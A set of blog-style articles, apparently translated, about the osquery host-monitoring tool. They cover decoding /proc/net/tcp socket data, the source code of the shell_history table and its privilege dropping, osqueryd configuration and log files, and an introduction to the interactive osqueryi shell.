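The decoding described in items 1-3 can be sketched as follows (decodeAddr, decodePort, and stateName are illustrative helpers; the byte reversal applies on little-endian machines such as x86):

```cpp
#include <cstdio>
#include <cstdlib>
#include <string>
#include <vector>

// Decode the IPv4 half of a token such as "9C02A8C0:C7AE". On x86 the
// kernel prints the 32-bit address in little-endian order, so the dotted
// quad reads from the low byte up: 0xC0=192, 0xA8=168, 0x02=2, 0x9C=156.
std::string decodeAddr(const std::string& hex) {
  unsigned long v = std::strtoul(hex.c_str(), nullptr, 16);
  char buf[16];
  std::snprintf(buf, sizeof(buf), "%lu.%lu.%lu.%lu",
                v & 0xFF, (v >> 8) & 0xFF, (v >> 16) & 0xFF, (v >> 24) & 0xFF);
  return buf;
}

// The port is plain hex: "C7AE" -> 51118.
unsigned decodePort(const std::string& hex) {
  return static_cast<unsigned>(std::strtoul(hex.c_str(), nullptr, 16));
}

// The st column indexes a table like osquery's tcp_states; index 0 is
// unused because kernel TCP states start at 1 (ESTABLISHED).
const std::vector<std::string> kTcpStates = {
    "UNKNOWN",    "ESTABLISHED", "SYN_SENT",  "SYN_RECV",
    "FIN_WAIT1",  "FIN_WAIT2",   "TIME_WAIT", "CLOSE",
    "CLOSE_WAIT", "LAST_ACK",    "LISTEN",    "CLOSING",
};

// st is hexadecimal, so "0A" is 10, i.e. LISTEN.
std::string stateName(const std::string& st_hex) {
  auto v = std::strtoul(st_hex.c_str(), nullptr, 16);
  return (v > 0 && v < kTcpStates.size()) ? kTcpStates[v] : "UNKNOWN";
}
```

For the sample row, decodeAddr("9C02A8C0") gives 192.168.2.156, decodePort("C7AE") gives 51118, and stateName("01") gives ESTABLISHED, matching the table output shown earlier.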

The article proc_net_tcp_decode explains each of these fields in detail.

By inspecting a specific pid's fd entries and checking for descriptors whose link targets start with socket:, we can tell whether the process is doing network communication.


Once we have the socket's inode, we can look it up in /proc/net/tcp to find that socket's details, such as the remote server's IP and port. The socket inode is thus the key that links a process to its network information.

Summary

On the importance of reading source code.

That's all.

Reading the osquery Source: Analyzing shell_history

Overview

The previous two articles covered how to use osquery; this one begins analyzing its source code, focusing on the shell_history and process_open_sockets tables. Studying their implementations shows how osquery answers SQL queries with system information, and also deepens one's understanding of Linux.

Table descriptions

shell_history exposes shell command history, while process_open_sockets records the host's current network activity. Example usage:

shell_history

osquery> select * from shell_history limit 3;
+------+------+-------------------------------------------------------------------+-----------------------------+
| uid  | time | command                                                           | history_file                |
+------+------+-------------------------------------------------------------------+-----------------------------+
| 1000 | 0    | pwd                                                               | /home/username/.bash_history |
| 1000 | 0    | ps -ef                                                            | /home/username/.bash_history |
| 1000 | 0    | ps -ef | grep java                                                | /home/username/.bash_history |
+------+------+-------------------------------------------------------------------+-----------------------------+

process_open_sockets showing a reverse shell connection:

osquery> select * from process_open_sockets order by pid desc limit 1;
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+
| pid    | fd | socket   | family | protocol | local_address | remote_address | local_port | remote_port | path | state      | net_namespace |
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+
| 115567 | 3  | 16467630 | 2      | 6        | 192.168.2.142 | 192.168.2.143  | 46368      | 8888        |      | ESTABLISH  | 0             |
+--------+----+----------+--------+----------+---------------+----------------+------------+-------------+------+------------+---------------+

osquery's code layout is very clear: all table definitions live under specs, and all table implementations live under osquery/tables.

Taking shell_history as the example, its definition is in specs/posix/shell_history.table:

table_name("shell_history")
description("A line-delimited (command) table of per-user .*_history data.")
schema([
    Column("uid", BIGINT, "Shell history owner", additional=True),
    Column("time", INTEGER, "Entry timestamp. It could be absent, default value is 0."),
    Column("command", TEXT, "Unparsed date/line/command history line"),
    Column("history_file", TEXT, "Path to the .*_history for this user"),
    ForeignKey(column="uid", table="users"),
])
attributes(user_data=True, no_pkey=True)
implementation("shell_history@genShellHistory")
examples([
    "select * from users join shell_history using (uid)",
])
fuzz_paths([
    "/home",
    "/Users",
])

shell_history.table defines all the relevant metadata: the entry point is the genShellHistory() function in shell_history.cpp, and it even supplies an example query, select * from users join shell_history using (uid). shell_history.cpp lives in osquery/tables/system/posix/shell_history.cpp.

Similarly, the table definition for process_open_sockets is in specs/process_open_sockets.table, and the implementations are in osquery/tables/networking/[linux|freebsd|windows]/process_open_sockets.cpp. Since process_open_sockets exists on multiple platforms, there is a process_open_sockets.cpp implementation under each of linux, freebsd, and windows. This article uses the Linux implementation as its example.

shell_history implementation

Background

Before diving into the analysis, some basic Linux concepts. There are many different Unix shells, such as bash, zsh, tcsh, and sh. bash is the most common today; it is the built-in shell of almost every Unix-like system, while zsh adds more features on top of bash. Whenever we type commands in a terminal, we are in fact using one of these shells.

Running ls -al in a user's home directory reveals a .bash_history file, which records every command entered in the terminal. Likewise, if you use zsh, a .zsh_history file records your commands.

A user's home directory may also contain a .bash_sessions directory. According to this article:

A new folder (~/.bash_sessions/) is used to store HISTFILE’s and .session files that are unique to sessions. If $BASH_SESSION or $TERM_SESSION_ID is set upon launching the shell (i.e. if Terminal is resuming from a saved state), the associated HISTFILE is merged into the current one, and the .session file is ran. Session saving is facilitated by means of an EXIT trap being set for a function bash_update_session_state.

.bash_sessions stores per-session HISTFILEs and .session files. If $BASH_SESSION or $TERM_SESSION_ID is set when the shell is launched, the associated session state is restored via $BASH_SESSION or $TERM_SESSION_ID once that session starts. This also means that *.history files under .bash_sessions record the command history of individual sessions.

Analysis

QueryData genShellHistory(QueryContext& context) {
    QueryData results;
    // Iterate over each user
    QueryData users = usersFromContext(context);
    for (const auto& row : users) {
        auto uid = row.find("uid");
        auto gid = row.find("gid");
        auto dir = row.find("directory");
        if (uid != row.end() && gid != row.end() && dir != row.end()) {
            genShellHistoryForUser(uid->second, gid->second, dir->second, results);
            genShellHistoryFromBashSessions(uid->second, dir->second, results);
        }
    }

    return results;
}

The code above is the entry function genShellHistory() of shell_history.cpp:

It iterates over all users, obtaining each user's uid, gid, and directory, and then calls genShellHistoryForUser() to collect that user's shell history; genShellHistoryFromBashSessions() serves a similar purpose.

genShellHistoryForUser():

void genShellHistoryForUser(const std::string& uid, const std::string& gid, const std::string& directory, QueryData& results) {
    auto dropper = DropPrivileges::get();
    if (!dropper->dropTo(uid, gid)) {
        VLOG(1) << "Cannot drop privileges to UID " << uid;
        return;
    }

    for (const auto& hfile : kShellHistoryFiles) {
        boost::filesystem::path history_file = directory;
        history_file /= hfile;
        genShellHistoryFromFile(uid, history_file, results);
    }
}

Note that before reading anything it first calls:

auto dropper = DropPrivileges::get();
if (!dropper->dropTo(uid, gid)) {
    VLOG(1) << "Cannot drop privileges to UID " << uid;
    return;
}

用于对giduid降权,为什么要这么做呢?后来询问外国网友,给了一个很详尽的答案:

Think about a scenario where you are a malicious user and you spotted a vulnerability(buffer overflow) which none of us has. In the code (osquery which is running usually with root permission) you also know that history files(controlled by you) are being read by code(osquery). Now you stored a shell code (a code which is capable of destroying anything in the system)such a way that it would overwrite the saved rip. So once the function returns program control is with the injected code(shell code) with root privilege. With dropping privilege you reduce the chance of putting entire system into danger.

There are other mitigation techniques (e.g. stack guard) to avoid above scenario but multiple defenses are required

In short, osquery usually runs with root privileges. If an attacker plants malicious shellcode in .bash_history and a vulnerability is triggered when osquery reads that file, the attacker could gain root privileges. Dropping privileges before reading user-controlled files neatly mitigates this class of problem.

/**
* @brief The privilege/permissions dropper deconstructor will restore
* effective permissions.
*
* There should only be a single drop of privilege/permission active.
*/
virtual ~DropPrivileges();

As the destructor's documentation shows, once the DropPrivileges object is destructed, the effective permissions are restored.
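The drop-and-restore pattern is easy to illustrate. Below is a minimal Python sketch (a hypothetical simplification for illustration, not osquery's actual C++ implementation) of the same idea: temporarily lower the effective uid/gid and restore them when the scope ends. To keep it runnable without root, the demo "drops" to the current real uid/gid, which is always permitted:

```python
import os

class DropPrivileges:
    """Temporarily switch the effective uid/gid; restore them on exit.

    Hypothetical sketch of the pattern behind osquery's DropPrivileges,
    not its real implementation.
    """

    def __init__(self, uid, gid):
        self.uid, self.gid = uid, gid
        self.saved_euid = os.geteuid()
        self.saved_egid = os.getegid()

    def __enter__(self):
        # Drop the gid first: once the euid is unprivileged, the process
        # may no longer be allowed to change its egid.
        os.setegid(self.gid)
        os.seteuid(self.uid)
        return self

    def __exit__(self, *exc):
        # Mirror ~DropPrivileges(): restore effective permissions.
        os.seteuid(self.saved_euid)
        os.setegid(self.saved_egid)

# Any file reads inside this block happen with the target user's rights.
with DropPrivileges(os.getuid(), os.getgid()):
    print(os.geteuid() == os.getuid())  # prints True
```

Running as root, DropPrivileges(uid, gid) would switch to the history file's owner before reading, exactly as genShellHistoryForUser() does.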

It then iterates over the kShellHistoryFiles list and calls genShellHistoryFromFile() for each entry. kShellHistoryFiles was defined earlier as:

const std::vector<std::string> kShellHistoryFiles = {
    ".bash_history", ".zsh_history", ".zhistory", ".history", ".sh_history",
};

As you can see, kShellHistoryFiles is simply the list of files that common shells use to record their history. Finally, genShellHistoryFromFile() reads each history file and parses its contents.

void genShellHistoryFromFile(const std::string& uid, const boost::filesystem::path& history_file, QueryData& results) {
    std::string history_content;
    if (forensicReadFile(history_file, history_content).ok()) {
        auto bash_timestamp_rx = xp::sregex::compile("^#(?P<timestamp>[0-9]+)$");
        auto zsh_timestamp_rx = xp::sregex::compile("^: {0,10}(?P<timestamp>[0-9]{1,11}):[0-9]+;(?P<command>.*)$");
        std::string prev_bash_timestamp;
        for (const auto& line : split(history_content, "\n")) {
            xp::smatch bash_timestamp_matches;
            xp::smatch zsh_timestamp_matches;

            if (prev_bash_timestamp.empty() &&
                xp::regex_search(line, bash_timestamp_matches, bash_timestamp_rx)) {
                prev_bash_timestamp = bash_timestamp_matches["timestamp"];
                continue;
            }

            Row r;

            if (!prev_bash_timestamp.empty()) {
                r["time"] = INTEGER(prev_bash_timestamp);
                r["command"] = line;
                prev_bash_timestamp.clear();
            } else if (xp::regex_search(
                    line, zsh_timestamp_matches, zsh_timestamp_rx)) {
                std::string timestamp = zsh_timestamp_matches["timestamp"];
                r["time"] = INTEGER(timestamp);
                r["command"] = zsh_timestamp_matches["command"];
            } else {
                r["time"] = INTEGER(0);
                r["command"] = line;
            }

            r["uid"] = uid;
            r["history_file"] = history_file.string();
            results.push_back(r);
        }
    }
}

The logic here is very clear:

  1. forensicReadFile(history_file, history_content) reads the file contents.
  2. Two regular expressions, bash_timestamp_rx and zsh_timestamp_rx, are compiled to parse the history file. for (const auto& line : split(history_content, "\n")) iterates over each line, matching it against bash_timestamp_rx and zsh_timestamp_rx.
  3. Row r;...;r["history_file"] = history_file.string();results.push_back(r); writes the parsed fields into a Row and appends it to the results.

That completes the parsing work of shell_history. Running select * from shell_history walks through the flow above and returns every historical command.
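To make the parsing flow concrete, here is a small Python transcription of the two regexes and the per-line logic (a sketch for illustration only; the real code is the C++ above):

```python
import re

# The same patterns as in shell_history.cpp, transcribed to Python re syntax.
BASH_TS = re.compile(r"^#(?P<timestamp>[0-9]+)$")
ZSH_TS = re.compile(r"^: {0,10}(?P<timestamp>[0-9]{1,11}):[0-9]+;(?P<command>.*)$")

def parse_history(content):
    rows = []
    prev_bash_ts = ""
    for line in content.split("\n"):
        if not line:
            continue  # blank lines skipped here for brevity
        # A bare "#<timestamp>" line carries the time of the NEXT line.
        if not prev_bash_ts:
            m = BASH_TS.search(line)
            if m:
                prev_bash_ts = m.group("timestamp")
                continue
        if prev_bash_ts:
            rows.append({"time": int(prev_bash_ts), "command": line})
            prev_bash_ts = ""
            continue
        # zsh extended history: ": <timestamp>:<duration>;<command>"
        m = ZSH_TS.search(line)
        if m:
            rows.append({"time": int(m.group("timestamp")),
                         "command": m.group("command")})
        else:
            rows.append({"time": 0, "command": line})  # plain history line
    return rows

print(parse_history("#1540386418\nls -al\n: 1540386466:0;whoami"))
```

Feeding it a bash-style timestamped pair, a zsh extended-history line, and a plain line reproduces the three branches of the C++ loop.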

As for the genShellHistoryFromBashSessions() function:

void genShellHistoryFromBashSessions(const std::string &uid,const std::string &directory,QueryData &results) {
    boost::filesystem::path bash_sessions = directory;
    bash_sessions /= ".bash_sessions";

    if (pathExists(bash_sessions)) {
        bash_sessions /= "*.history";
        std::vector <std::string> session_hist_files;
        resolveFilePattern(bash_sessions, session_hist_files);

        for (const auto &hfile : session_hist_files) {
            boost::filesystem::path history_file = hfile;
            genShellHistoryFromFile(uid, history_file, results);
        }
    }
}

genShellHistoryFromBashSessions() collects history in a straightforward way:

  1. It resolves all files matching .bash_sessions/*.history;
  2. It calls the same genShellHistoryFromFile(uid, history_file, results) method to collect the historical commands.

Summary

Reading the code of well-written open-source software not only teaches you the relevant domain knowledge but also exposes you to its design philosophy. A white hat who can learn quickly cannot afford weak spots; what they have instead is a broad base of solid skills plus a few standout strengths.

Monitoring a system with osqueryd

0x01 Overview

The article "Getting started with osquery" introduced osquery mainly through osqueryi. osqueryi is an interactive shell that is very convenient for testing, but for production use osqueryd is clearly the better fit. This article describes the use of osqueryd in detail.

0x02 osqueryd configuration

With osqueryi, settings can be passed on the command line, e.g. osqueryi --audit_allow_config=true --audit_allow_sockets=true --audit_persist=true. What about osqueryd? After installation, osquery exists as a system service that can be controlled with systemctl; its unit file is at /usr/lib/systemd/system/osqueryd.service:

[Unit]
Description=The osquery Daemon
After=network.service syslog.service

[Service]
TimeoutStartSec=0
EnvironmentFile=/etc/sysconfig/osqueryd
ExecStartPre=/bin/sh -c "if [ ! -f $FLAG_FILE ]; then touch $FLAG_FILE; fi"
ExecStartPre=/bin/sh -c "if [ -f $LOCAL_PIDFILE ]; then mv $LOCAL_PIDFILE $PIDFILE; fi"
ExecStart=/usr/bin/osqueryd \
  --flagfile $FLAG_FILE \
  --config_path $CONFIG_FILE
Restart=on-failure
KillMode=process
KillSignal=SIGTERM

[Install]
WantedBy=multi-user.target

The start command is ExecStart=/usr/bin/osqueryd --flagfile $FLAG_FILE --config_path $CONFIG_FILE, which points to the configuration files via --flagfile and --config_path. $FLAG_FILE and $CONFIG_FILE are defined in /etc/sysconfig/osqueryd:

FLAG_FILE="/etc/osquery/osquery.flags"
CONFIG_FILE="/etc/osquery/osquery.conf"
LOCAL_PIDFILE="/var/osquery/osqueryd.pidfile"
PIDFILE="/var/run/osqueryd.pidfile"

So the default configuration files are /etc/osquery/osquery.flags and /etc/osquery/osquery.conf. When osqueryd starts, it creates these two files as empty files if they do not exist; otherwise it reads their contents. osquery.conf can be regarded as a superset of osquery.flags: osquery.flags only sets flags, all of which can equally be set in osquery.conf, while osquery.conf can additionally define the SQL queries osqueryd should run. The rest of this article therefore focuses on osquery.conf.
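As an illustration, a minimal osquery.flags contains nothing but one flag per line; the values below are illustrative (the flags themselves are documented in Command Line Flags):

```
--config_path=/etc/osquery/osquery.conf
--logger_plugin=filesystem
--logger_path=/var/log/osquery
--utc=true
```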

0x03 osquery.conf

osquery ships with an example osquery.conf, written as a JSON file (with comments). A simplified version:

{
  // Configure the daemon below:
  "options": {
    // Select the osquery config plugin.
    "config_plugin": "filesystem",

    // Select the osquery logging plugin.
    "logger_plugin": "filesystem",

    // The log directory stores info, warning, and errors.
    // If the daemon uses the 'filesystem' logging retriever then the log_dir
    // will also contain the query results.
    //"logger_path": "/var/log/osquery",

    // Set 'disable_logging' to true to prevent writing any info, warning, error
    // logs. If a logging plugin is selected it will still write query results.
    //"disable_logging": "false",

    // Splay the scheduled interval for queries.
    // This is very helpful to prevent system performance impact when scheduling
    // large numbers of queries that run a smaller or similar intervals.
    //"schedule_splay_percent": "10",

    // A filesystem path for disk-based backing storage used for events and
    // query results differentials. See also 'use_in_memory_database'.
    //"database_path": "/var/osquery/osquery.db",

    // Comma-delimited list of table names to be disabled.
    // This allows osquery to be launched without certain tables.
    //"disable_tables": "foo_bar,time",

    "utc": "true"
  },

  // Define a schedule of queries:
  "schedule": {
    // This is a simple example query that outputs basic system information.
    "system_info": {
      // The exact query to run.
      "query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
      // The interval in seconds to run this query, not an exact interval.
      "interval": 3600
    }
  },

  // Decorators are normal queries that append data to every query.
  "decorators": {
    "load": [
      "SELECT uuid AS host_uuid FROM system_info;",
      "SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1;"
    ]
  },
  "packs": {
    // "osquery-monitoring": "/usr/share/osquery/packs/osquery-monitoring.conf",
    ....
  }
}

The osquery.conf file has roughly four parts:

  • options: configuration options. Command Line Flags documents essentially all of them; this is also the part that osquery.flags configures, which is why osquery.conf can be regarded as a superset of osquery.flags;
  • schedule: the scheduled SQL statements. Since osqueryd runs as a daemon, queries are defined in schedule so that they execute periodically and return results;
  • decorators: literally "decorations". decorators also defines a set of SQL statements whose results are appended to the results of every schedule query; here the decorators fetch the host uuid and the logged-in username;
  • packs: bundled collections of SQL statements;

0x04 Configuration details

The previous section gave a brief description of the osquery.conf settings; this section explains them in more detail.

options

  • options are the settings. Command Line Flags documents essentially all of them; interested readers can explore further. This section only covers a few common ones;
  • config_plugin: set to filesystem here. Managing osquery via osquery.conf uses filesystem; the other option is tls (configuring osquery via an API);
  • logger_plugin: set to filesystem, which is also osquery's default. According to Logger plugins, it can also be tls, syslog (for POSIX), windows_event_log (for Windows), kinesis, firehose, or kafka_producer;
  • database_path: defaults to /var/osquery/osquery.db. osquery uses a database internally, and this option sets the location of its database files;
  • disable_logging: whether osquery should write results to local disk; this overlaps somewhat with logger_plugin: filesystem;
  • host_identifier: the identifier used for each host, e.g. the hostname.

schedule

schedule is where osqueryd's SQL statements are written. One example entry:

"system_info": {
    // The exact query to run.
    "query": "SELECT hostname, cpu_brand, physical_memory FROM system_info;",
    // The interval in seconds to run this query, not an exact interval.
    "interval": 3600
}

Here system_info is the name of a SQL task, itself a JSON object with several settings:

  1. query: the SQL statement to execute;
  2. interval: the execution interval in seconds; 3600 in the example means the query runs roughly every 3600 seconds;
  3. snapshot: optional; can be set to snapshot: true. By default osquery runs in differential mode; snapshot switches to snapshot mode. For example, with select * from processes;, osquery normally reports the difference from the previous run, whereas with snapshot it reports all processes every time, without comparing against previous results;
  4. removed: optional, defaults to true; controls whether logs with action removed are recorded.

There are also some less common options, such as platform, version, shard, description, and so on.

More about schedule can be found in the schedule documentation.
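For instance, a schedule entry using the snapshot option described above might look like this (the task name and query are made up for illustration):

```json
"mounts_snapshot": {
  "query": "SELECT device, path, type FROM mounts;",
  "interval": 86400,
  "snapshot": true
}
```

Once a day this logs the full mount list to the snapshot log instead of a diff.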

decorators

As the comment Decorators are normal queries that append data to every query says, decorator results are appended to the results of the SQL statements in schedule; by that definition decorators are optional. In this example there are two decorators:

SELECT uuid AS host_uuid FROM system_info;
SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1;
  1. SELECT uuid AS host_uuid FROM system_info; takes the uuid from system_info as the first identifier;
  2. SELECT user AS username FROM logged_in_users ORDER BY time DESC LIMIT 1; takes the most recent user (i.e. the username) from logged_in_users as the second identifier.

You could write more decorator statements as additional identifiers, but that is rarely necessary.

packs

packs are bundled collections of SQL statements. This example uses /usr/share/osquery/packs/osquery-monitoring.conf, an official pack of SQL statements for monitoring system information:

{
  "queries": {
    "schedule": {
      "query": "select name, interval, executions, output_size, wall_time, (user_time/executions) as avg_user_time, (system_time/executions) as avg_system_time, average_memory, last_executed from osquery_schedule;",
      "interval": 7200,
      "removed": false,
      "blacklist": false,
      "version": "1.6.0",
      "description": "Report performance for every query within packs and the general schedule."
    },
    "events": {
      "query": "select name, publisher, type, subscriptions, events, active from osquery_events;",
      "interval": 86400,
      "removed": false,
      "blacklist": false,
      "version": "1.5.3",
      "description": "Report event publisher health and track event counters."
    },
    "osquery_info": {
      "query": "select i.*, p.resident_size, p.user_time, p.system_time, time.minutes as counter from osquery_info i, processes p, time where p.pid = i.pid;",
      "interval": 600,
      "removed": false,
      "blacklist": false,
      "version": "1.2.2",
      "description": "A heartbeat counter that reports general performance (CPU, memory) and version."
    }
  }
}

The entries in packs are configured exactly the same way as those in schedule. The information this pack queries includes:

  • osquery_schedule: the configuration of the schedules set up in osqueryd;
  • osquery_events: all the events supported by osqueryd;
  • processes and osquery_info: process-related information.

The benefit of packs is that a series of SQL statements serving the same purpose can be kept in a single file.

0x05 Running osqueryd

With the configuration in place, start the daemon with sudo osqueryd. With logger_plugin: filesystem, the logs land locally under /var/log/osquery. This directory contains several files, each recording different information.

osqueryd.results.log: osqueryd's differential results are written to this file, one JSON record per line. For example:

{"name":"auditd_process_info","hostIdentifier":"localhost.localdomain","calendarTime":"Wed Oct 24 13:07:12 2018 UTC","unixTime":1540386432,"epoch":0,"counter":0,"decorations":{"host_uuid":"99264D56-9A4E-E593-0B4E-872FBF3CD064","username":"username"},"columns":{"atime":"1540380461","auid":"4294967295","btime":"0","cmdline":"awk { sum += $1 }; END { print 0+sum }","ctime":"1538239175","cwd":"\"/\"","egid":"0","euid":"0","gid":"0","mode":"0100755","mtime":"1498686768","owner_gid":"0","owner_uid":"0","parent":"4086","path":"/usr/bin/gawk","pid":"4090","time":"1540386418","uid":"0","uptime":"1630"},"action":"added"}
{"name":"auditd_process_info","hostIdentifier":"localhost.localdomain","calendarTime":"Wed Oct 24 13:07:12 2018 UTC","unixTime":1540386432,"epoch":0,"counter":0,"decorations":{"host_uuid":"99264D56-9A4E-E593-0B4E-872FBF3CD064","username":"username"},"columns":{"atime":"1540380461","auid":"4294967295","btime":"0","cmdline":"sleep 60","ctime":"1538240835","cwd":"\"/\"","egid":"0","euid":"0","gid":"0","mode":"0100755","mtime":"1523421302","owner_gid":"0","owner_uid":"0","parent":"741","path":"/usr/bin/sleep","pid":"4091","time":"1540386418","uid":"0","uptime":"1630"},"action":"added"}

Here added means the process information was added relative to the previous run; each execution result is one JSON record.
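Because each line is a standalone JSON record, the results log is easy to consume programmatically. A small Python sketch (the sample line is trimmed down from the real records for brevity):

```python
import json

def summarize(lines):
    """Extract (name, action, cmdline) from osqueryd.results.log lines."""
    events = []
    for line in lines:
        rec = json.loads(line)
        events.append((rec["name"], rec["action"],
                       rec["columns"].get("cmdline", "")))
    return events

sample = ('{"name":"auditd_process_info","action":"added",'
          '"columns":{"cmdline":"sleep 60"}}')
print(summarize([sample]))  # [('auditd_process_info', 'added', 'sleep 60')]
```

The same pattern applies when shipping the log to a SIEM: parse each line as JSON and route on the name and action fields.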

osqueryd.snapshots.log records the results of the SQL statements marked with snapshot: true:

{"snapshot":[{"header":"Defaults","rule_details":"!visiblepw"},{"header":"Defaults","rule_details":"always_set_home"},{"header":"Defaults","rule_details":"match_group_by_gid"},{"header":"Defaults","rule_details":"env_reset"},{"header":"Defaults","rule_details":"env_keep = \"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\""},{"header":"Defaults","rule_details":"env_keep += \"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\""},{"header":"Defaults","rule_details":"env_keep += \"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\""},{"header":"Defaults","rule_details":"env_keep += \"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\""},{"header":"Defaults","rule_details":"env_keep += \"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\""},{"header":"Defaults","rule_details":"secure_path = /sbin:/bin:/usr/sbin:/usr/bin"},{"header":"root","rule_details":"ALL=(ALL) ALL"},{"header":"%wheel","rule_details":"ALL=(ALL) ALL"}],"action":"snapshot","name":"sudoers","hostIdentifier":"localhost.localdomain","calendarTime":"Tue Oct  9 11:54:00 2018 UTC","unixTime":1539086040,"epoch":0,"counter":0,"decorations":{"host_uuid":"99264D56-9A4E-E593-0B4E-872FBF3CD064","username":"username"}}
{"snapshot":[{"header":"Defaults","rule_details":"!visiblepw"},{"header":"Defaults","rule_details":"always_set_home"},{"header":"Defaults","rule_details":"match_group_by_gid"},{"header":"Defaults","rule_details":"env_reset"},{"header":"Defaults","rule_details":"env_keep = \"COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS\""},{"header":"Defaults","rule_details":"env_keep += \"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\""},{"header":"Defaults","rule_details":"env_keep += \"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\""},{"header":"Defaults","rule_details":"env_keep += \"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\""},{"header":"Defaults","rule_details":"env_keep += \"LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY\""},{"header":"Defaults","rule_details":"secure_path = /sbin:/bin:/usr/sbin:/usr/bin"},{"header":"root","rule_details":"ALL=(ALL) ALL"},{"header":"%wheel","rule_details":"ALL=(ALL) ALL"}],"action":"snapshot","name":"sudoers","hostIdentifier":"localhost.localdomain","calendarTime":"Tue Oct  9 11:54:30 2018 UTC","unixTime":1539086070,"epoch":0,"counter":0,"decorations":{"host_uuid":"99264D56-9A4E-E593-0B4E-872FBF3CD064","username":"username"}}

Because snapshot is a full-snapshot mode, the results are written out in full even when two consecutive runs are identical.

osqueryd.INFO records the running state of osqueryd. For example:

Log file created at: 2018/11/22 17:06:06
Running on machine: osquery.origin
Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg
I1122 17:06:06.729902 22686 events.cpp:862] Event publisher not enabled: auditeventpublisher: Publisher disabled via configuration
I1122 17:06:06.730651 22686 events.cpp:862] Event publisher not enabled: syslog: Publisher disabled via configuration

osqueryd.WARNING records osquery's warnings. For example:

Log file created at: 2018/10/09 19:53:45
Running on machine: localhost.localdomain
Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg
E1009 19:53:45.471046 104258 events.cpp:987] Requested unknown/failed event publisher: auditeventpublisher
E1009 19:53:45.471606 104259 events.cpp:987] Requested unknown/failed event publisher: inotify
E1009 19:53:45.471634 104260 events.cpp:987] Requested unknown/failed event publisher: syslog
E1009 19:53:45.471658 104261 events.cpp:987] Requested unknown/failed event publisher: udev

osqueryd.ERROR records osquery's error messages. For example:

Log file created at: 2018/10/09 19:53:45
Running on machine: localhost.localdomain
Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg
E1009 19:53:45.471046 104258 events.cpp:987] Requested unknown/failed event publisher: auditeventpublisher
E1009 19:53:45.471606 104259 events.cpp:987] Requested unknown/failed event publisher: inotify
E1009 19:53:45.471634 104260 events.cpp:987] Requested unknown/failed event publisher: syslog
E1009 19:53:45.471658 104261 events.cpp:987] Requested unknown/failed event publisher: udev

In this example the errors and warnings happen to be identical; in practice they often differ.

0x06 Summary

This article gave a brief account of the common osqueryd configuration, so that you can get up and running with osquery quickly. For reasons of space, many aspects of osquery were not covered in detail. The official documentation describes osqueryd's configuration very thoroughly; if anything here is unclear, consult that documentation, and feel free to discuss these topics with me.

That's all.

Getting started with osquery

0x01 Overview

osquery is a piece of software open-sourced by Facebook for querying, monitoring, and analyzing systems. Its own description reads:

osquery exposes an operating system as a high-performance relational database. This allows you to write SQL-based queries to explore operating system data. With osquery, SQL tables represent abstract concepts such as running processes, loaded kernel modules, open network connections, browser plugins, hardware events or file hashes.

When you run commands such as ps, top, or ls -l on Linux, you may notice that their output has a very fixed, table-like format. Perhaps based on this observation, Facebook developed osquery, which exposes the operating system as a high-performance relational database. With osquery we can use SQL-like statements to query information such as running processes, loaded kernel modules, network connections, and browser plugins (the granularity of what can be queried depends on how much osquery implements).

osquery supports many platforms, including macOS, CentOS, Ubuntu, Windows 10, and FreeBSD; the supported versions are listed on the osquery homepage. Its accompanying documentation and sites are also comprehensive, including the homepage, GitHub, readthedocs, and Slack.

This article uses CentOS as the example for installing and using osquery.

0x02 Installation

The homepage provides installation packages for the different operating systems; download the rpm for CentOS. In this example the file is osquery-3.3.0-1.linux.x86_64.rpm; install it with sudo yum install osquery-3.3.0-1.linux.x86_64.rpm. A successful installation ends with:

Installed:
  osquery.x86_64 0:3.3.0-1.linux                                                                                                                                                             
Complete!

0x03 Running

osquery has two modes of operation: osqueryi (interactive mode) and osqueryd (daemon mode).

  • osqueryi is completely independent of osqueryd, does not need to run as an administrator, and lets you inspect the current state of the operating system on the spot.
  • osqueryd performs scheduled queries and records changes in the operating system, e.g. process changes (added/removed) between one run and the next; it saves the results (to a file, or straight into Kafka). osqueryd also uses operating-system APIs to record changes to files and directories, hardware events, network activity, and more. On Linux, osqueryd runs as a system service.

For demonstration purposes, we will use osqueryi to show off osquery's capabilities. Simply type osqueryi in a terminal to enter interactive mode (osqueryi adopts the sqlite shell syntax, so all of sqlite's built-in functions are available).

[user@localhost Desktop]$ osqueryi
Using a virtual database. Need help, type '.help'
osquery> .help
Welcome to the osquery shell. Please explore your OS!
You are connected to a transient 'in-memory' virtual database.

.all [TABLE]     Select all from a table
.bail ON|OFF     Stop after hitting an error
.echo ON|OFF     Turn command echo on or off
.exit            Exit this program
.features        List osquery's features and their statuses
.headers ON|OFF  Turn display of headers on or off
.help            Show this message
.mode MODE       Set output mode where MODE is one of:
                   csv      Comma-separated values
                   column   Left-aligned columns see .width
                   line     One value per line
                   list     Values delimited by .separator string
                   pretty   Pretty printed SQL results (default)
.nullvalue STR   Use STRING in place of NULL values
.print STR...    Print literal STRING
.quit            Exit this program
.schema [TABLE]  Show the CREATE statements
.separator STR   Change separator used by output mode
.socket          Show the osquery extensions socket path
.show            Show the current values for various settings
.summary         Alias for the show meta command
.tables [TABLE]  List names of tables
.width [NUM1]+   Set column widths for "column" mode
.timer ON|OFF      Turn the CPU timer measurement on or off

Through .help we can see the basic operations available in osqueryi mode: .exit quits osqueryi, .mode switches the output format, .show displays the current osqueryi settings, .tables lists all the tables supported on the current operating system, and .schema [TABLE] shows the structure of a specific table.

